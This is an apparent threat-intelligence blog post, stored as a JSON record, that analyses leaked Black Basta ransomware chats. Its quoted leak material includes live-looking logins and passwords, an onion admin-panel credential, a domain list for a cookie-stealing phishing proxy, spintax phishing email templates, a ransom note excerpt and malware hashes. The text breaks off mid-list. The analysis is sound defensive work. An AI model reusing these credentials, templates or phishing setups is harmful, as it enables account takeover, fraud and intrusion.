{ "id": "f6547f18-e908-4da7-89bf-ac3e1ca79323", "created_at": "2026-04-06T00:14:12.782902Z", "updated_at": "2026-04-10T13:12:16.448805Z", "deleted_at": null, "sha1_hash": "85bc8992c6e30f3420a14d18e477242505872058", "title": "Inside BlackBasta: What Leaked Conversations Reveal About Their Ransomware Operations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1879900, "plain_text": "Inside BlackBasta: What Leaked Conversations Reveal About\r\nTheir Ransomware Operations\r\nArchived: 2026-04-05 15:40:53 UTC\r\nBlog\r\nExecutive Summary\r\nRecently, there has been a series of secret chat logs leaked from a group of people that distribute the ransomware\r\nknown as ‘Black Basta’. The chat logs contain general conversations, insights into their operations and their\r\ninternal infrastructure. These observations of how a group operates and communicates are rare, and provide\r\ninsight into their Tactics, Techniques \u0026 Procedures (TTPs).\r\nWhat is BlackBasta ransomware?\r\nBlack Basta is a ransomware strain that uses ChaCha20 and XChaCha20 symmetric encryption algorithms to\r\nencrypt the files it holds for ransom. Black Basta infections have been seen mostly against Small and Medium-Sized Enterprises (SME), seem to be using public services for victim selection.\r\nVictims of Black Basta ransomware covers a diverse range of industries, including Construction, Law,\r\nTransportation, Manufacturing, Electrical, and Financial Services.\r\nGeographically, the most targeted regions include the United States, Germany, the United Kingdom, Canada, Italy,\r\nand Switzerland.\r\nIntroduction\r\nThis comprehensive overview provides valuable insight into the recently leaked conversations, which span from\r\n2023 September into 2024 June. These discussions collectively offer a deeper understanding of the group’s\r\noperations, including their tactics, decision-making processes, and strategic shifts over time.\r\nThis analysis concentrates solely on the dataset derived from bestflowers.json , which was disclosed by a\r\nsource known as “ExploitWhispers” through Telegram.\r\nThreat Actor Insights\r\nCurrent Status of Black Basta Ransomware\r\nRecent indications suggest that Black Basta is currently inactive. The latest information regarding the group\r\nreveals a period of inactivity since the beginning of the year, attributed to internal conflicts. For further details.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 1 of 30\n\nFigure 1: Black Basta Inactivity\r\nSource of the Leak\r\nThe Leak initially popped up on Telegram (= whisper stop) mentioning a https[:]//mega[.]nz link which was\r\npromptly taken down.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 2 of 30\n\nFigure 2: Dataset Leaks\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 3 of 30\n\nFigure 3: Black Basta Inactivity\r\nRevenue Based Target Selection\r\nCommercial services such as Revenue Storm and Zoominfo seem to have been heavily used to select targets\r\nacross different geographies, depending on the dataset available online, direct links describing the potential\r\nvictims were shared:\r\nrevenue_6B_to25M.csv\r\nFOUND_USA_revenue_6B_to_25M.csv\r\nFOUND_Canada_revenue_10B_to_15M.csv\r\nFOUND_USA_revenue_6B_to_25M.csv\r\nFOUND_Canada_revenue_10B_to_15M.csv\r\nrevenue_6B_to25M.csv\r\nFOUND_USA_revenue_6B_to_25M.csv\r\nFOUND_Canada_revenue_10B_to_15M.csv\r\n@usernamegg\r\nI think that 200-300 million earned and 10% is normal\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 4 of 30\n\nIn this regard, our approach is +- the same, I also understand that foot soldiers will never be able to conduct\r\nThat's why now I'm trying to strengthen the team with competent personnel.\"\r\nBlack Basta Organisation\r\nThe analysis of the conversations reveals an intriguing observation. The members of Black Basta conduct\r\nthemselves, as if it were an ordinary day at work, engaging in general discussions about their usual operations.\r\n@usernamegg\r\nHi\r\neveryone is getting things going\r\nwhat will be the hashes\r\ndid you have work in the summer?\r\n@usernameboy\r\nOkay, no, we were resting\r\nis the capacity OK?\r\nHuman Element\r\nBreakdown of the Chat Contributors\r\nThe use of various potential chat systems has been noted among the members, who frequently refer to a “new\r\nelement.”. This term may indicate a shift in the chat system, the formation of a new group chat, or the exploration\r\nof an alternative communication platform.\r\n@usergg\r\nHi, waiting for contacts\r\nLogin: pro100boy Password: 4W1VSS!xZVaSGEDg%bgwr1GwTSx3fdvTVtt5vEAR\r\nMail: pro100boy@electionusa2025[.]shop\r\nI'm leaving here\r\nusergg - look for me by this nickname in the new element (chat?)\r\nThe visualization of the 79 threads and 48 contributors reveals collaboration patterns with a dominant central hub\r\nand peripheral clusters of connected users.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 5 of 30\n\nFigure 4: User Collaboration Network\r\nFrom a purely volumetric perspective, a small number of users have generated the majority of the content within\r\nthe groups. The use of username aliases appears to be a consistent trend. Is there a consensus among the most\r\nactive contributors regarding a fixed alias? Could it be that the same user is behind these aliases?\r\nMessage Analytics\r\nWho is the largest contributor to the Black Basta chats?\r\nBased on our observations, the image below presents analytics regarding the most engaged active users. Notably,\r\n“usernamegg” stands out as the most active participant, demonstrating the highest level of interaction within the\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 6 of 30\n\nobserved chat leaks.\r\nFigure 5: Black Basta Message Analytics\r\n@usernamegg has been observed to be the “head of the operations” taking a big part of the decision making,\r\nadministrative tasks. Here is an example of @usernamegg creating new accounts and move chats over to new\r\ndomains:\r\nusernamegg,matrix.bestflowers247.online,Login: pro100boy Password: 4W1V...omitted...vEAR Mail: pro100boy@electi\r\nusernamegg,matrix.bestflowers247.online,Login: user777 Password: t3gg...omitted...TsvD Mail: user777@electionusa\r\nusernamegg,matrix.bestflowers247.online,Login: hunterpass Password: tVgV!...omitted...AXdBa Mail: hunterpass@ele\r\nusernamegg,matrix.bestflowers247.online,electionusa2025[.]shop\r\nusernamegg,matrix.bestflowers247.online,Login: ugway Password: Re@@...omitted...qAvV Mail: ugway@electionusa2025\r\nusernamegg,matrix.bestflowers247.online,Login: userlapa Password: CdFR...omitted...tdAC Mail: userlapa@electionu\r\nusernamegg,matrix.bestflowers247.online,Login: burrito Password: !2Qs...omitted...xACW Mail: burrito@electionusa\r\nusernamegg,matrix.bestflowers247.online,Login: timber Password: xBd4...omitted...ADe3 Mail: timber@electionusa20\r\nusernamegg,matrix.bestflowers247.online,Login: chuck Password: qeg2...omitted...@!v25 Mail: chuck@electionusa202\r\nusernamegg,matrix.bestflowers247.online,Login: cameron Password: B4R%...omitted...X%dDg Mail: cameron@electionus\r\nusernamegg,matrix.bestflowers247.online,Login: cob_crypt_ward Password: SaTB...omitted...tbxVe Mail: cob_crypt_w\r\nusernamegg,matrix.bestflowers247.online,Login: han Password: zeeC...omitted...QGad Mail: han@electionusa2025[.]s\r\nusernamegg,matrix.bestflowers247.online,electionusa2025[.]shop - server name\r\nusernamegg,matrix.bestflowers247.online,Login: znet Password: @@dr...omitted...1wEA Mail: znet@electionusa2025[.\r\nTruly Global Operation\r\nWe have put together the geographical locations involved, based on public IP data relating to over 3000 leaked IP\r\naddresses, including both compromised infrastructure and victims. This highlights the low-cost of available\r\ninfrastructure and ease of access/compromise devices that can be utilised to launch attacks, host intermediate\r\ninfrastructure on, or use for Command and Control.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 7 of 30\n\nFigure 5: Black Basta IP locations\r\nSituational Awareness\r\nThe group conducted thorough monitoring of their online presence, exchanging messages about themselves a total\r\nof 65 times. Black Basta has been diligently tracking reports concerning the group, as well as other entities such as\r\nBlackCat, Rhysida, LockBit, Kaseya, and Stormous, and their related articles.\r\nTimeline of users within the chat, the volume of messages and how that is spread over the duration of the chat\r\nlogs:\r\nFigure 6: News Awareness\r\nLockBit disruption discussion\r\nBlack Basta reacts to law enforcement taking down LockBit servers via PHP vulnerabilities.\r\nusernameyy,https: //www.bleepingcomputer.com/news/security/lockbits-seized-site-comes-alive-to-tease-new-police\r\nusernameyy,poor guy\r\nusernamegg,we could have the same outcome at any moment\r\nusernamegg,all old chats need to be deleted so that they can't be restored)\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 8 of 30\n\nusernameyy,thank God our servers with keys are not connected to the admin panel at all\r\nusernameyy,we've done everything correctly\r\nusernamegg,time will tell)\r\nusernameyy,they've taken a harsh approach to ransom\r\nusernameyy,they put a guy from Revil in jail a couple of days ago\r\nusernameyy,13 years old\r\nusernamegg,yes\r\nusernamegg,I saw\r\nChatter with LockBit Support after FBI report\r\nAn intriguing dialogue with Lockbit Support followed the release of a report by the FBI. This conversation\r\nhighlights concerns surrounding a particular issue related to PHP vulnerable servers utilised by the FBI. The\r\ndiscussion appears to pivot towards Black Basta, suggesting they are working on a solution to address this matter.\r\n2024-02-20 09:42:25\r\n[11:14:26] BB: Hello\r\n[11:14:33] BB: What's going on?\r\n[11:14:38] BB: How are you there?\r\n[11:14:43] BB: https: //www.bleepingcomputer.com/news/security/lockbit-ransomware-disrupted-by-global-police-ope\r\n[11:57:27] LockBit: FBI uses vulnerable PHP to hack a couple of servers, servers with data are intact, I'm sitti\r\n[12:42:00] BB: I ponyl, I'll fix it, everything will be fine ok.\r\nObserved Discussions on Rhysida Ransomware\r\nWe have thoroughly examined and analysed various discussions surrounding Rhysida ransomware, drawing\r\ninsights from multiple sources and reports, including those from Trend Micro and SentinelOne.\r\nThese discussions also referenced links to the Rhysida onion leak site, raising questions about its credibility as the\r\n“first office blog.” The conversations indicate a proactive approach to monitoring Rhysida’s activities, likely for\r\nthe purposes of competitive intelligence or to identify operational overlaps.\r\nNegotiation\r\nFrom the typical ransom.txt:\r\n\"- Do not hire a recovery company. They can't decrypt without the key.\r\nThey also don't care about your business. They believe that they are\r\ngood negotiators, but it is not. They usually fail. So speak for yourself.\"\r\n\"Hello ...omitted victim...\r\nThank you for joining this private chat. This chat is secure and confidential. It is all TLP: Red and only desig\r\nTypically we will send an introductory message explaining who we are, and what is going on with your systems, an\r\nFirst, we understand that most likely we are now talking to a Mandiant representative. This means you know who B\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 9 of 30\n\nSecond, we hope you realize that while Mandiant is the one curating the investigation, our counterpart here is .\r\nNow, when we covered the negotiation side, we will go straight to the case.\r\nAs you yourself know, we had locked over 12000 of your servers and harvested 3 TB of your data. In any other cas\r\nHOWEVER, in this case, the situation is different.\r\nYou are a hospital network, moreover, a religious one, and we are not some deplorable garbage like the other gro\r\nSo, please read this VERY CAREFULLY:\r\nWe are aware of the current disruptions, from diverted ambulances to cancelled surgery appointments. This wasn't\r\nHence, this is our proposal.\r\nRight now, you perform a medical triage. Think, assess and figure out what you can tell us on what can be done t\r\nTechnical Analysis\r\nThrough our analysis of the conversations, we have identified several tools that the group employs to support their\r\noperations.\r\nAttack Vectors\r\nBased on the dataset observed in the bestflowers.json we have observed the following attack vectors being\r\nused by Black Basta during the timeframe of the conversations that were leaked online.\r\nPhishing Attacks – Performing large-scale phishing campaigns targeting Microsoft services like Office\r\n365 and Azure. The attackers register and configure fraudulent domains, obtain SSL certificates, and use\r\nreverse proxies to intercept login credentials and session cookies, bypassing MFA protections.\r\n#### **May 15, 2024 - 19:31:50**\r\n- **UsernameGG:**\r\n \"[21:45:31] _: There are no TXT records on the domains yet (needed to issue the certificate), I will only be a\r\n [21:46:01] _: Reference for the panel\r\n [21:46:12] _: 29:AF:EE:84:8D:C6:FD:86:3F:F0:FA:9A:F1:0E:9B:51:AF:CE:A0:34:E8:81:02:61:E4:B2:E6:66:14:15:0C:C0\r\n [21:46:12] _: https[:]//jyrl5cskoqv5miqssygjmfnqq7c6s3vrxuo2dehej2jj5vxvw4ukeeid.onion:8081/K4fUPie-pZaLjS9TjB\r\n [21:46:15] _: admin_panelp/iePUTTCgKRJANw7;jF35Si53KMC\r\n [21:46:23] _: admin_panel\r\n [21:46:25] _: EF;p/iePUTTCgKRJANw7;jF35Si53KMC\r\n [21:46:31] _: Login credentials\r\n [21:46:42] _: The first thing is the sha256 fingerprint of the certificate that needs to be verified\r\n [21:46:54] _: Then the link, login, password\r\n [21:48:03] _: I’ll be AFK for about 8 hours\r\n [21:58:03] **AA:** ++\"\r\n#### **May 15, 2024 - 20:30:11**\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 10 of 30\n\n- **UsernameYY:**\r\n \"https[:]//jyrl5cskoqv5miqssygjmfnqq7c6s3vrxuo2dehej2jj5vxvw4ukeeid.onion:8081/K4fUPie-pZaLjS9TjBzhuxPVDcUeCQ\r\n basic:\r\n admin_panel\r\n EF;p/iePUTTCgKRJANw7;jF35Si53KMC\"\r\n#### **May 16, 2024 - 09:00:25**\r\n- **UsernameGG:**\r\n \"[Pending - 2024-05-15]\r\n [16:51:55] **AA:** Hey\r\n [16:51:57] **AA:** ?\r\n [16:55:49] _: Hi, I'm here\r\n [16:55:58] _: About Microsoft phishing reverse\r\n [16:56:29] _: Keep in mind that for it to work, about 25 domains need to be set up\r\n [16:56:51] **AA:** Hi\r\n [16:56:53] **AA:** Yeah\r\n [16:56:56] **AA:** Why so many?\r\n [16:57:08] **AA:** Are you intercepting cookies?\r\n [16:57:12] **AA:** Will you set everything up?\r\n [16:57:21] _: office365.com: // *.res.\r\n [16:57:21] _: live.com:\r\n [16:57:21] _: s-microsoft.com:\r\n [16:57:21] _: microsoftonline.com:\r\n [16:57:21] _: microsoft.com: // *.pipe.aria.\r\n [16:57:21] _: microsoft365.com:\r\n [16:57:21] **AA:** I’ll be doing corporate phishing\r\n [16:57:21] _: office.com: // *.delve.\r\n [16:57:21] _: office.net: // *.cdn. *.public.cdn.\r\n [16:57:21] _: msftauth.net:\r\n [16:57:21] _: msauth.net:\r\n [16:57:21] _: azure.com:\r\n [16:57:21] _: googleapis.com:\r\n [16:57:21] _: azureedge.net:\r\n [16:57:21] _: akamaized.net:\r\n [16:57:21] _: sharepoint.com:\r\n [16:57:21] _: 1drv.ms:\r\n [16:57:21] _: live.net:\r\n [16:57:21] _: msecnd.net:example.com\r\n [16:57:21] _: clarity.ms:example.com\r\n [16:57:21] _: adnxs.com:example.com\r\n [16:57:21] _: 3lift.com:example.com\r\n [16:57:21] _: c.bing.com:example.com\r\n [16:57:22] _: godaddy.com:\r\n [16:57:22] _: adfs:\r\n [16:57:22] _: github.com:\r\n [16:57:22] _: githubassets.com:\r\n [16:57:22] _: okta.com:\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 11 of 30\n\n[16:57:23] _: oktacdn.com:\r\n [16:57:28] _: These are the domains that need to be replaced\r\n [16:57:32] _: That’s why there are so many\r\n [16:57:33] _: The interception is working\r\n [16:57:41] _: We need proxies and domains\r\n [16:57:45] **AA:** Alright\r\n [16:57:47] _: You add the domains yourself, I can help with the rest\r\n [16:57:51] **AA:** How much do you charge for setup?\r\n [16:58:00] _: Everything is already set up\r\n [16:58:07] _: The deployment will be ready in 20 minutes\r\n [16:58:15] **AA:** What about domains?\r\n [16:58:27] _: You install the domains\r\n [16:58:36] **AA:** Where?\r\n [16:58:44] _: In the panel, I’ll send the address\r\n [16:58:44] **AA:** I have to set up the domains?\r\n [16:58:48] _: And the IP where to install as well\r\n [16:59:01] _: Do not use newly registered domains or it will be flagged\r\n [16:59:05] _: We need dropped domains\r\n [16:59:25] **AA:** Do you know anyone selling them?\r\n [16:59:30] _: Yes\r\n [16:59:37] **AA:** Can you buy them yourself?\r\n [16:59:40] **AA:** I’ll send the money\r\n [16:59:51] **AA:** I need to test if it works\r\n [16:59:51] _: Okay\r\n [16:59:55] **AA:** Will this method work?\r\n [17:00:10] _: BTC/XMR?\r\n [17:00:34] **AA:** If I can intercept their cookies and instantly access Microsoft SSO Security\r\n [17:00:39] **AA:** There will be many opportunities\r\n [17:00:46] **AA:** BTC\r\n [17:00:59] _: bc1q52e6l39xsaxjhz66qpdh8msacrnf5q0a0fn364\"\r\nCredential Stuffing for Remote Access – Brute-force attacks, exploits or utilising leaked, stolen or\r\nExposed login credentials for major enterprise remote access portals, including:\r\nVPN and Firewall products including: Citrix, Checkpoint, SonicWall, Pulse Secure, ScreenConnect,\r\nGlobalProtect, Juniper Secure Connect, RDP and RDWeb\r\nAdmin credentials leaked alongside user passwords\r\nActive brute-force testing on Citrix portals with confirmed success.\r\nMention of BMT (possibly botnet infrastructure) and IP tracking:\r\n64.176.219[.]106 repeatedly referenced in the conversations\r\n@usernamegg\r\nI have a mail pass 500k database\r\ncan you decrypt it?\r\nhow long will it take?\r\n\u003cpresumably @usernamegg sharing hashes\u003e\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 12 of 30\n\nphoto_2023-10-03 15.37.25.jpeg\r\nphoto_2023-10-03 15.37.28.jpeg\r\n@usernameboy\r\nWe need to understand what type of hash it is, I'll figure out what it is\r\nThere are well over 1000 messages about credential dump / brute-forced password files:\r\n1FORTI_VALID_REVENUE.txt\r\n2FORTI_BRUTED_VALID_REVENUE.txt\r\nADFS_VALID_idpinitiatedsignon.txt\r\nAUTH_FROM_APOLLO_VALID_20240209.txt\r\nAUTH_FROM_APOLLO_VALID_20240210.txt\r\nAUTH_FROM_APOLLO_VALID_20240211.txt\r\nAUTH_FROM_APOLLO_VALID_20240212.txt\r\nAUTH_FROM_APOLLO_VALID_20240213.txt\r\nAUTH_FROM_APOLLO_VALID_20240214.txt\r\nAUTH_FROM_APOLLO_VALID_20240215.txt\r\nAUTH_FROM_APOLLO_VALID_20240216.txt\r\nAUTH_FROM_APOLLO_VALID_20240217.txt\r\nAUTH_FROM_APOLLO_VALID_20240218.txt\r\nAUTH_FROM_APOLLO_VALID_20240222.txt\r\nAUTH_FROM_APOLLO_VALID_20240223.txt\r\nAUTH_FROM_APOLLO_VALID_20240224.txt\r\nAUTH_FROM_APOLLO_VALID_20240225.txt\r\nAUTH_FROM_APOLLO_VALID_20240226.txt\r\nAUTH_VALID_.txt\r\nAUTH_VALID_20240209.txt\r\nAUTH_VALID_20240211.txt\r\nAUTH_VALID_20240212.txt\r\nAUTH_VALID_20240213.txt\r\nAUTH_VALID_20240214.txt\r\nAUTH_VALID_20240215.txt\r\nAUTH_VALID_20240216.txt\r\nAUTH_VALID_20240222.txt\r\nAUTH_VALID_OWA.txt\r\nCISCO_BRUTED_VALID_IPS.txt\r\nCISCO_BRUTED_VALID_IPS.txt\r\nCISCO_BRUTED_VALID_IPS_REVENUE.txt\r\nCISCO_BRUTED_VALID_ITEMS.txt\r\nCISCO_BRUTED_VALID_ITEMS_REVENUE.txt\r\nCISCO_VALID_ITEMS.txt\r\nCISCO_VALID_ITEMS16.txt\r\nCISCO_VALID_ITEMS_.txt\r\nCW_VALID_AU.txt\r\nCW_VALID_CA.txt\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 13 of 30\n\nCW_VALID_CH.txt\r\nCW_VALID_DE.txt\r\nCW_VALID_FR.txt\r\nCW_VALID_GB.txt\r\nCW_VALID_HK.txt\r\nCW_VALID_NZ.txt\r\nCW_VALID_US.txt\r\nFORTI_BRUTED_VALID_REVENUE.txt\r\nforti_hkcu.txt\r\nforti_hklm.txt\r\nFORTI_VALID_.txt\r\nFORTI_VALID_FROM_ALL_FILES_REVENUE.txt\r\nFORTI_VALID_FROM_ALL_FILES_REVENUE.txt\r\nFORTI_VALID_FROM_SPM.txt\r\nFORTI_VALID_REVENUE.txt\r\nPALO_VALID_FILTERED.txt\r\nSONIC_BRUT_VALID_REVENUE.txt\r\nSONIC_VALID_.txt\r\nSONIC_VALID_ITEMS_REVENUE.txt\r\nSOPHOS_VALID_.txt\r\nVALID_2kkdomains.txt\r\nVALID_BRUT_CISCO\r\nVALID_BRUT_CISCO16.txt\r\nVALID_BRUT_FORTI.txt\r\nVALID_BRUT_RDWE\r\nVALID_BRUT_RDWEB.txt\r\nVALID_BRUT_RDWEB16.txt\r\nVALID_BRUT_RDWEB_.txt\r\nVALID_BRUT_SONIC.txt\r\nVALID_BRUT_SONIC16.txt\r\nVALID_BRUT_SONIC_.txt\r\nVALID_PANELS_LIST_FOR_SHELLS.txt\r\nVALID_corps_randomize.txt\r\nVALID_need.txt\r\nThe group also had discussions regarding payments for hash cracking and password decryption services.\r\n@usernamegg\r\nI found a request where it will be OK for brute force\r\nforti doesn't break the connection there\r\nbut authorization encrypted\r\nenc=00b078b248a68a5b95d7a92fb...omitted...32759bf2600000000000000000000000000\r\nthis is the request that is sent\r\nand it is hardcoded there lmcintyre:ca...omitted...burger22!\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 14 of 30\n\nthere seems to be salt here\"\nyes, we need to figure out how many iterations, but it will be slow anyway\nUse of Malicious Scripts – Executing scripts (e.g., ‘.vbs’, ‘.msi’) to establish persistence.\nRemote Code Execution (RCE) – Running commands through compromised access.\nExploiting Cloud \u0026 SaaS Services – Obtaining unauthorised access to enterprise services.\nSocial Engineering via IT Spoofing – Impersonating IT departments to gain access to sensitive\ninformation.\nSOCKS Proxy Usage for Anonymisation – Utilising compromised proxies for stealthy operations.\nproxychains ssh root@216[.]146.25.53 = mickiemckittrick[.]net USA\nPassword: A5WV...omitted..._Kw5RbYD3E\nTargeting Jenkins – Conducting reconnaissance and information gathering.\nAutomated Botnets \u0026 Load Balancing – Employing bots for scanning and automating attacks.\nMalicious Attachments – Crafting deceptive messages to circumvent security measures. The aliases\n@lapa and @usernamegg have been discussing email templates, @usernamegg sharing 20 email templates\non 2023-09-25:\nTinker first set - 10 emails for file\nDear Recipient,\nI {hope|trust|wish|believe}, this message {finds|reaches|arrives to|meets}, you in {good|excellent|prime|fine},\nGreetings.\nFor your {convenience|ease|benefit|comfort}, the {document|file|material|record}, you've been {waiting|looking|h\nHello,\nI {trust|believe|hope|assume}, this email {reaches|arrives to|gets to|happens upon}, you {promptly|quickly|speed\nGood day!\n{Acknowledging|Recognizing|Noting|Observing}, your {request|inquiry|demand|query}, from our {recent|latest|previ\nGood day.\nIn {line|accordance|alignment|conjunction}, with our {previous|prior|earlier|last}, {discussion|conversation|tal\nHello, Sir/Madam.\nOur {team|group|crew|unit}, has {prepared|readied|set up|arranged}, and {attached|affixed|linked|added}, the {fi\nDear Colleague,\nPlease {find|locate|see|identify}, {attached|enclosed|affixed|appended}, the {documents|papers|files|materials},\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\nPage 15 of 30\n\nGreetings.\r\nIn our {continued|ongoing|persistent|sustained}, {effort|endeavor|attempt|drive}, to {serve|assist|help|support}\r\nHello,\r\n{Thank|Appreciate|Gratitude|Acknowledgment}, you for your {patience|tolerance|forbearance|endurance}. {Enclosed\r\nDear Sir/Madam,\r\nYour {requested|desired|asked-for|sought}, {documents|papers|files|materials}, are now {ready|set|prepared|good}\r\n\"Second set - 10 emails for link - I had to test here to keep the dialog format\"\r\nHey,\r\n{Hope|Trust|Believe|Wish}, you're {doing|feeling|going|being}, well. I've {dropped|left|placed|set}, the link {h\r\nHi,\r\n{Hope|Trust|Believe|Wish}, you're well. I've {attached|linked|added|included}, the link you {requested|asked for\r\nHello,\r\n{Just|Simply|Only|Merely}, wanted to {shoot|send|forward|give}, you the link. {Also|Moreover|Furthermore|Plus},\r\nHey there,\r\n{Remember|Recall|Recollect|Think about}, that link you {asked|inquired|questioned|wondered}, about? {Here|Here i\r\nHi,\r\nI've {secured|obtained|got|acquired}, the link you were {inquiring|asking|querying|wondering}, about {earlier|be\r\nHey,\r\n{Here's|Here is|This is|Presenting}, that link. {Thought|Felt|Believed|Considered}, you'd {like|love|want|prefer\r\nHello,\r\nI am {ensuring|making sure|guaranteeing|assuring}, you {received|got|obtained|acquired}, the gateway link in a {\r\nHey,\r\nAs {promised|stated|said|told}, {here's|here is|this is|I'm sending}, the link. And... it's your gateway to {und\r\nHello,\r\n{Here's|Here is|This is|Presenting}, the link. {Beyond|Apart from|Outside of|Besides}, the main {stuff|content|m\r\nHi,\r\n{Here's|Here is|This is|Presenting}, the link you {mentioned|talked about|spoke of|referred to}, the {other|prev\r\nGood day,\r\nI've {provided|given|offered|supplied}, the link as {requested|asked for|wanted|demanded}. {Beyond|Outside|Apart\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 16 of 30\n\nMalware shared\r\nDiscussions have highlighted the presence of potential malicious file samples. It appears that members were\r\nverifying the samples they had uploaded or checking for any that had been reported. Additionally, a new collection\r\nhas been added to VirusTotal.\r\nhttps://www.virustotal.com/gui/file/67fd74add9de8de8b4006ee023cd9afe78c913cfac176bf9664de8a90fc1ac4f/detection\r\nhttps://www.virustotal.com/gui/file/63b3d18919359d1e4d0bd8b325d71bd3d72d6d0c10e84659b188a53a4948792e/detection\r\nhttps://www.virustotal.com/gui/file/c7102c6da4d36183cc79150e98dd8838aeef9f3cd255dfd8269934e5d80932d5/detection\r\nhttps://www.virustotal.com/gui/file/69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320/detection\r\nhttps://bazaar.abuse.ch/sample/21cbf06080ae61f95617b3f65f85af5a1390133af6c5c516ac251f9f9cde7fa7/\r\nhttps://bazaar.abuse.ch/sample/4525336edf9ecc516f36cdd379b6f31acdbd668b42ce6a6158344762e5aa0dee/\r\nhttps://bazaar.abuse.ch/sample/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242/\r\nhttps://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/\r\nhttps://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/\r\nhttps://bazaar.abuse.ch/sample/74c69940f96ccad21c7bfa75d6ee8dec4a78b16e0a32abe104d24c2076a574d5/\r\nhttps://bazaar.abuse.ch/sample/693ff5db0a085db5094bb96cd4c0ce1d1d3fdc2fbf6b92c32836f3e61a089e7a/\r\nhttps://bazaar.abuse.ch/sample/ce616c5d472d8d22169e1cabd8c99a511394b1c28febc944f427137a0354e8db/\r\nhttps://bazaar.abuse.ch/sample/f4be945a6678a11bc4d2e3819cba8b91665eaf99e152cf0348e16d1fd94b2e75/\r\nhttps://bazaar.abuse.ch/sample/6199895decf1e8dd173ffeb8818fe49069c2a53fd446e2b32de4c8dda99a79de/\r\nhttps://bazaar.abuse.ch/sample/150db7e3c65a152c3a056733e8b42451ff22f13b10c6676bf4933d6f4e0797ad/\r\nhttps://bazaar.abuse.ch/sample/c5793613219a782eb08205921a3f9ed97c2c74de18e0cd36008046d1a5e1288e/\r\nhttps://bazaar.abuse.ch/sample/4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001/\r\nhttps://bazaar.abuse.ch/sample/dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86/\r\nhttps://bazaar.abuse.ch/sample/462c92282bd4dff657faf6de04a6da96572bfad06bae7ecb15c922c74be96b30/\r\nhttps://bazaar.abuse.ch/sample/c111221c3c59b9f9c50d57c3880a4c09ecbc358e5bbe69e44b3945660ceb07bb/\r\nhttps://bazaar.abuse.ch/sample/336f7e8de57d29f4360210eaf46b33b414c0c22bd0bdadf5bdecbdf46474d898/\r\nhttps://bazaar.abuse.ch/sample/ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b/\r\nhttps://bazaar.abuse.ch/sample/a30798880eab8c6158073a38e63d5c014de3976e623e38c29b65dc1e6b0be3ef/\r\nhttps://bazaar.abuse.ch/sample/a633ede541f3b86835ba11aea4278db5b37bb7040a6bb81f057819c0fafcdc99/\r\nhttps://bazaar.abuse.ch/sample/d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4/\r\nhttps://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/\r\nhttps://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/\r\nVTDIFF: https://www.virustotal.com/gui/diffs/detail/21507568815\r\nDarkGate\r\nFile Formats: PDF and MSI\r\nSamples referenced:\r\nPDF: 74c69940f96ccad21c7bfa75d6ee8dec4a78b16e0a32abe104d24c2076a574d5\r\nMSI: 693ff5db0a085db5094bb96cd4c0ce1d1d3fdc2fbf6b92c32836f3e61a089e7a\r\nPikaBot\r\nFile Formats: JS and EXE\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 17 of 30\n\nSamples referenced:\r\nJS: ce616c5d472d8d22169e1cabd8c99a511394b1c28febc944f427137a0354e8db\r\nEXE: f4be945a6678a11bc4d2e3819cba8b91665eaf99e152cf0348e16d1fd94b2e75\r\nWshrat\r\nFile Formats: JS\r\nSamples referenced:\r\nJS: 6199895decf1e8dd173ffeb8818fe49069c2a53fd446e2b32de4c8dda99a79de\r\nRemcosRAT\r\nFile Formats: IMG and CAB\r\nSamples referenced:\r\nIMG: 150db7e3c65a152c3a056733e8b42451ff22f13b10c6676bf4933d6f4e0797ad\r\nCAB: c5793613219a782eb08205921a3f9ed97c2c74de18e0cd36008046d1a5e1288e\r\nGuLoader\r\nFile Formats: VBS\r\nSamples referenced:\r\nVBS #1: 4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001\r\nVBS #2: dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86\r\nOther / Unspecified Malware\r\nThe logs also reference additional individual samples without a specific malware family name. These\r\ninclude:\r\nLNK: 462c92282bd4dff657faf6de04a6da96572bfad06bae7ecb15c922c74be96b30\r\nEXE in RAR: c111221c3c59b9f9c50d57c3880a4c09ecbc358e5bbe69e44b3945660ceb07bb\r\nMSI: 336f7e8de57d29f4360210eaf46b33b414c0c22bd0bdadf5bdecbdf46474d898\r\nHTA: ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b\r\nDOC: 